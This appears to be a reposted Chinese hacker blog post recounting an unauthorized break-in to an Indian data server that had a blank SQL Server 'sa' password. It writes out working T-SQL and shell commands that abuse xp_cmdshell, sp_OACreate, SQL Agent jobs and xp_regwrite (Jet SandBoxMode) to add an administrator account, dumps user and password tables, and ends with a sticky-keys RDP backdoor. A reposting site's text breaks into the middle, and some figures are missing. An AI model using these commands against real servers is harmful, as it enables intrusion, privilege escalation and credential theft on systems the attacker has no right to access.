作者:瘋吇ぺx[BHST]
BLOG:http://hi.baidu.com/hacker_fengzi
一.写在最前
其实此次成功入侵这台印度data服务器靠的并不是SA,而是利用也不知道是谁留下的shift后门,
挑战印度变态SA网站安全
。可能大家看见都会笑,那你写出来干什么几秒钟搞定的事。确实是这样如果知道有这么个后门任谁几秒钟的时间都搞定了。之所以写出来是因为小菜我感觉这个SA很BT,如果没有那个shift后门小菜我无论如何也进不去。所以这也算是个提问的文章,如果是大家遇到这个情况该怎么办。如果谁有好的办法和思路一定要告诉我哦,也让小菜我多学学东西。二.起因
话说某天偶正在游戏中砍怪,只见QQ狂闪,打开一看,我晕!一大堆sa。这年头也不知道这小子在哪扫来这么多。朋友跟我说都N变态。心想不是SA吗!再变态能变态到哪去,那么多存储过程可以利用,还拿下不你了。于是游戏一关马上进入战场。
三.山穷水复疑无路
既然是SA什么也不说了直接 SQL TOOLS 连接上,随便执行个命令。如图1.
这是什么原因?找不到sp_OACreate,如果是找不到也应该是找不到xp_cmdshell啊!怎么还找上sp_OACreate了。于是SQL查询分析器连接上,先来查看一下相应的存储过程是否存在。
执行 Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell' 如图2.
执行成功看来并没有删除。继续执行
exec master..xp_cmdshell 'net user fengzi 123456 /add' 如图3.
还是一样的结果,难道问题出在xplog70.dll上?那来恢复一下看看
执行EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'
返回如图4.
恢复不了问题出在sp_addextendedproc上,那现在想上传恢复也不行了。甚至想自己添加个xplake2.dll直接执行命令的思路也断了。既然xp_cmdshell没办法利用了,我们再试试其他的存储过程。大家都知道SQL SERVER 提供了一些函数访问OLE对象的,有sp_OACREATE和sp_OAMETHOD,那我们现在就可以利用他们来调用OLE控件。使用sp_OACREATE来调用wscript.shell和shell.Application或者scripting.filesystemobject赋给变量@shell,然后再使用sp_OAMETHOD调用@shelll的属性run来执行命令。前提条件就是sp_OACREATE调用的对象必须存在。
我们在SQL分析器里执行
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINDOWS\system32\cmd.exe /c net user fengzi 123456 /add'
返回如图5.
看来SP_OAcreate和SP_OAMETHOD都被删除了,意料之中。刚才根据图一的返回结果就猜测无法成功。既然不行那我们来试试JOB,也就是利用SQL代理。前提是SQLSERVERAGENT必须开启,这里我们可以利用xp_servicecontrol来开启SQLSERVERAGENT服务。
执行 exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
如图6.
成功开启SQLSERVERAGENT服务,下面分别执行如下语句
use msdb exec sp_delete_job unll,'fengzi' //进入MSDB数据库,删除名为fengzi的作业,防止出错
exec sp_add_job 'fengzi' //建立一个名为fengzi的作业
exec sp_add_jobstep Null,'fengzi',Null,'1','CMDEXEC','cmd /c net user fengzi !@#$1234qwer /add & net localgroup administrators fengzi /add' //添加一个操作到名为fengzi的作业中
exec sp_add_jobserver Null,'fengzi',@@servername exec sp_start_job 'fengzi' //启动这个名为fengzi的作业,
电脑资料
《挑战印度变态SA网站安全》(http://meiwen.anslib.com)。 如图7.
OK 我们成功启动了fengzi这个作业并且加入了管理员组。剩下的就是登陆3389。可是郁闷的事情出来了,用户没有添加成功。如图8
用户没有加进去。按照常理应该是没有问题的啊!那问题无非就是出现在CMD和net方面。这里先放一放,我们来看看SandBoxMode怎么样,也顺便验证一下我们的疑问。默认情况下JET数据引擎是不支持
select shell ("net user fengzi !@#$1234qwer /add") 这样的语句的。但是开启了JET引擎的沙盒模式就可以执行命令了。前提是xp_regwrite必须存在。说完了原理我们来执行
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
如图9.
如图13
返回出错,没传上去?郁闷!明知道是CMD或net做了限制也没办法,传不上去东西。(command.com和net1也都试过,没成功)转了半天在查询分析器上发现tsilweb的库于是
执行select * from sysobjects where xtype = 'U'
如图14.
返回了tsilweb库中的所有表。site_users 应该存储着用户的信息呵呵 看来希望就在这里
继续提交 select * from site_users返回如图15.
我晕 连个字段都没有。其他的几个表也都查看了一番,都没找到有用的东东。再来看看admin库里有什么返回如图16.
发现一个users的表进去后发现好几个用户和密码,如图17.
尝试着去3389和主站登陆,(直接访问这个IP得到登陆界面,这是干什么用的谁知道告诉我下)如图18.
都登陆不了。于是又试这用 users_new 表的用户和密码登陆也都没有成功。服务器上没有其他站点,主站又没办法入手,到这里小菜我是黔驴技穷了。如果哪位牛牛还有什么思路请告知小弟。
四.柳暗花明又一村
现在只能是同网段进行嗅探了,话都说到这了马上抄起hscan开扫,看看同网段还有没有什么弱口令(侥幸心里)。突然一个问题出现在我脑海里,服务器设置的这么变态,那管理员为什么还要设置sa空口令呢?难道是想让全世界的 来挑战他的变态服务器吗?我想除了如来佛主谁都不会这么做。那答案就只有一个,是被前人日进去了后把漏洞封掉了,(日进去的小子倒是精明,直接在cmd和net上做手脚,赞一个)那他会不会留下后门呢?比如。。。。。。。
嘿嘿 有思路就要试试看 马上连接3389 5下shift 如图19。
呵呵 这下爽歪歪了.马上运行CMD 如图20
看来是CMD动了手脚 无法创建CMD进程,那再来看看command.com 倒是可以执行但是什么命令都执行不了。如图21.
不让在命令行下加用户我手工总可以吧!运行lusrmgr.msc 本地用户组管理,如图22.
日又被禁用了,看来管理(或前者)真是煞费苦心啊!那就直接explorer.exe 呵呵 这下日进去了
如图23。
本来想做进一步渗透的,但是3389很卡,而且每次不到半分钟就马上断开,想一想还是算了,目的已经达到了。
五.总结
虽说最后成功的得到的系统的权限,但是我感觉并不完美。大家试想一下着,如果没有那个shitf还有办法得到系统权限吗?或许某位牛牛可以,但是小菜我只能进行到这里。还是那句话,之所以写出来,是希望如果哪位牛牛有幸能看到这篇文章有思路突破的时候麻烦告知小弟,感激不尽。